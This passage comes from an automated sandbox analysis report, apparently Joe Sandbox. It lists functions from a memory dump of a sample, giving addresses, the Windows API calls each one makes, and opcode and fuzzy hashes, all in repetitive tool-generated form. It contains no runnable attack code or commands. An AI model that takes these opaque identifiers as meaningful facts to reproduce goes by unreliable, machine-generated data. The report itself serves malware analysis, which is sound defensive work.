Part of subcall function 00BDB505: __EH_prolog.LIBCMT ref: 00BDB50A

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a314c98bf7a2e100914af19e97102cb3872d371468e19f6a37666604a826bda7
Instruction ID: 8aa5c30de85bc0fe1caa8d1f433895d96034ddca439e7663f8f79be46b494bdb
Opcode Fuzzy Hash: a314c98bf7a2e100914af19e97102cb3872d371468e19f6a37666604a826bda7
Instruction Fuzzy Hash: 144149B0905B41AEE724DF398885AE6FBE5BF28300F50496ED5FE83382DB316654CB50

Function 00BD13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BD13E1

Part of subcall function 00BD5E37: __EH_prolog.LIBCMT ref: 00BD5E3C

Part of subcall function 00BDCE40: __EH_prolog.LIBCMT ref: 00BDCE45

Part of subcall function 00BDB505: __EH_prolog.LIBCMT ref: 00BDB50A

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 1049bc508937651850067ddabcc97bb1abca825174c0650d78634dfc0fc645f5
Instruction ID: 51d9089c961327ff4c0d14dfb13b442ef70c664518b858aef54f36b1b528bb3b
Opcode Fuzzy Hash: 1049bc508937651850067ddabcc97bb1abca825174c0650d78634dfc0fc645f5
Instruction Fuzzy Hash: 464149B0905B409EE724DF798885AE6FBE5BF28300F50496ED5FE83282DB326654CB50

Function 00BEB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BEB098

Part of subcall function 00BD13DC: __EH_prolog.LIBCMT ref: 00BD13E1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: dd3ce1df275981b66dbf0e38671961d4919da51bcae49caa6f3f3f52f312a584
Instruction ID: ea47077fbfbf9fd245b1c939ce53d0fddfb548337f8e29ce7cf95393d5274771
Opcode Fuzzy Hash: dd3ce1df275981b66dbf0e38671961d4919da51bcae49caa6f3f3f52f312a584
Instruction Fuzzy Hash: B8316B71C14289AACF15DF69C9919EEBBF4AF09300F1044DEE409B7242E735AE04CB61

Function 00BFAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00C03A34), ref: 00BFACF8

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 52f7c5e716bd8925e44ccb87ab49215b176a90b11fb51478c4f34b1964d92fe7
Instruction ID: 3148d1f162891a4a2897d3f39142727338e2e8896c2912bc9200011719a587ba
Opcode Fuzzy Hash: 52f7c5e716bd8925e44ccb87ab49215b176a90b11fb51478c4f34b1964d92fe7
Instruction Fuzzy Hash: 7811C4B76002296B9B2A9A1CEC50A7AB3D5EB8432071A45A0EE19EB254D630DC05C6D2

Function 00BD9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BD921A

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 556defa33f4153c9bb3c2c73f40dde141a779ea939b5fd7d4785f0d801bc9c94
Instruction ID: 355dd723598c54184d777447994558f070db477fbdbdb0138dc9c03ed3b1c85d
Opcode Fuzzy Hash: 556defa33f4153c9bb3c2c73f40dde141a779ea939b5fd7d4785f0d801bc9c94
Instruction Fuzzy Hash: 4F016973900564ABCF11AB68CD819DEFBB5EF88750F054696E815B7351EA34CD04C7A0

Function 00BF3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00BF3C3F

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 169333c8d8cc2a5aa2c00c905c8103a912a3c7b346d7fd00aaa75da75b5f2b38
Instruction ID: 22611c17455271c6c66c89c3b3ef1282d09f5e610e614e963a4c353ee4d19d8d
Opcode Fuzzy Hash: 169333c8d8cc2a5aa2c00c905c8103a912a3c7b346d7fd00aaa75da75b5f2b38
Instruction Fuzzy Hash: AAF0E53221031E9FCF158EA8EC00BAA77E9EF01F207104165FB05E7190DB31DA24C790

Function 00BF8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BFCA2C,00000000,?,00BF6CBE,?,00000008,?,00BF91E0,?,?,?), ref: 00BF8E38

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 49c5603c6812bcbda30b76ad8c1f06380f0c01398e78171c322a6629a98371cf
Instruction ID: 4c7bcaf6507ed36d35d856ddabfcb50267ef5a5678e3b3d172702ff4b7cc928e
Opcode Fuzzy Hash: 49c5603c6812bcbda30b76ad8c1f06380f0c01398e78171c322a6629a98371cf
Instruction Fuzzy Hash: 33E06D3560622D67EA7226659D05BBF76C8DF417A4F1601E1BF18AB095CF20CD0882E1

Function 00BD5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BD5AC2

Part of subcall function 00BDB505: __EH_prolog.LIBCMT ref: 00BDB50A

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2d35a025f8a76441b392c044031d44646f1260f8e9573f5c3a0a3cb60eebb066
Instruction ID: 6ee2375e90aef8151d9c0f63ff58131f3c5d94787e33a785dfd5974bfac599a1
Opcode Fuzzy Hash: 2d35a025f8a76441b392c044031d44646f1260f8e9573f5c3a0a3cb60eebb066
Instruction Fuzzy Hash: A50169308206D0DED725F7B8C0557DDFBE49FA4305F5484CEA45663282CBB81B08D6A2

Function 00BDA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00BDA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA6C4
Part of subcall function 00BDA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA6F2
Part of subcall function 00BDA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00BDA592,000000FF,?,?), ref: 00BDA6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BDA598

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 1f37c7750d2e492cb5326b3f336e6dec6e81524e6c5e2c997c1625f92bf43bd5
Instruction ID: 52fa5e8349127549a3022634bc437643ba83631182df0a1373e1bdacf89dd845
Opcode Fuzzy Hash: 1f37c7750d2e492cb5326b3f336e6dec6e81524e6c5e2c997c1625f92bf43bd5
Instruction Fuzzy Hash: F7F08236009790EACF2257B49944BCBFBD46F2A335F048A8BF1FD52296D27550949B23

Function 00BE0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00BE0E3D

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 2696004e8f0fc67ade72da671209c2ec646754433ac4fb44227e40919b861506
Instruction ID: f2b3bf04aee7fc184b2c574d50fd96a19876b21fadfcbf5c18b2e05fbc42759c
Opcode Fuzzy Hash: 2696004e8f0fc67ade72da671209c2ec646754433ac4fb44227e40919b861506
Instruction Fuzzy Hash: 66D01221E250D556DA11333A68557FE26CACFCB311F0D04E7B64957282DBA848C6A261

Function 00BEA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00BEA62C

Part of subcall function 00BEA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00BEA3DA

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: e306d76066f3de20231300985edb6df79a7a14d0b79c0abb9bf2dffae16c89bb
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: E8D0C971210249BADF426F738C5296E7ADEFB01340F0481A5B842D9291EBB1FD10A666

Function 00BEE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00BEE5E3

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: e044ed64d0bfa049107522ab4dc00907090072b50a0a89fa567b03118e07d55b
Instruction ID: c35489baf16aeffcf65cff35ce6a1436ea16cc505299d08679febbcb6d22957e
Opcode Fuzzy Hash: e044ed64d0bfa049107522ab4dc00907090072b50a0a89fa567b03118e07d55b
Instruction Fuzzy Hash: 08D012B01D02D09FD702EBAAB88671D33D4F335706FA811D1F565D15A5DB64C880CA25

Function 00BEDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00BE1B3E), ref: 00BEDD92

Part of subcall function 00BEB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BEB579
Part of subcall function 00BEB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BEB58A
Part of subcall function 00BEB568: IsDialogMessageW.USER32(000103FE,?), ref: 00BEB59E
Part of subcall function 00BEB568: TranslateMessage.USER32(?), ref: 00BEB5AC
Part of subcall function 00BEB568: DispatchMessageW.USER32(?), ref: 00BEB5B6

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: c578cb236b795efe2728166a0ef27b344b68d2c8f71ed91ede16e05d624acc9c
Instruction ID: 086004acfc55852ddce7508ef0cfb2aaa841b12340013349cddf08a75bf35c0e
Opcode Fuzzy Hash: c578cb236b795efe2728166a0ef27b344b68d2c8f71ed91ede16e05d624acc9c
Instruction Fuzzy Hash: 1AD09E31158340BAD6022B52DD06F0F7AE2BB98B05F004594B384740F1CBB29D61DB11

Function 00BD98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00BD97BE), ref: 00BD98C8

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: ffbce2b8a352bbab52afc3103c2146e9270b1761c5f022d5f679019db8807758
Instruction ID: 93f836597addb13754fec0326268a6136dd17213948263f76420d9e22d3c72b0
Opcode Fuzzy Hash: ffbce2b8a352bbab52afc3103c2146e9270b1761c5f022d5f679019db8807758
Instruction Fuzzy Hash: 7CC0123840410585CE2046249844099F351EA53BE57B886D5C038891E1D323CC47FB10

Function 00BEE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3

Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7f9e7f7ff32100a6e7cbfc205a861cc81c76626505b2762484e2d1258379fe04
Instruction ID: 296ac94097b6b4153ba4175fc63dd213602c09af41818616f11fe61b737edd35
Opcode Fuzzy Hash: 7f9e7f7ff32100a6e7cbfc205a861cc81c76626505b2762484e2d1258379fe04
Instruction Fuzzy Hash: 18B012D526C0C0AC310853071C42C3B018CC0C1B11B30C17EFC25C01C0FA40EC4C1432

Function 00BEE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3

Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4c0ee97275aea74672341bb11e80089e92475590f3b1d70170d297b73b66bd97
Instruction ID: 2f085cabefa824e4e58e98330703a7ca239236362be9466ad069b709b2475671
Opcode Fuzzy Hash: 4c0ee97275aea74672341bb11e80089e92475590f3b1d70170d297b73b66bd97
Instruction Fuzzy Hash: 9FB012D936C1C0AC3108524B1C82C3B018CC0C0B11B30417EFC25C00C0FB40EC441532

Function 00BEE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3

Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 55d00e1f6e0673295ed63adc86289accd021f8601ee62c248960203c7d8f9657
Instruction ID: c75aa2a41ef17f54f1f8566e0eb1c972d043e4a4b4b167c8cf9b864cfd9e73c3
Opcode Fuzzy Hash: 55d00e1f6e0673295ed63adc86289accd021f8601ee62c248960203c7d8f9657
Instruction Fuzzy Hash: C8B012D936C1C0BC310812471C92C3B014CC0C1B11B30857EFC21D04C0FA40EC441432

Function 00BEE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3

Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 94a7cf4731b56875f46221f9362c05b0a5f7f2e663c80583cab2fbf8e01c8d9f
Instruction ID: f4c527ab77f7c40c0693ac6ccf438a34cf0293348bc0e3827fdd1aa94144e3b9
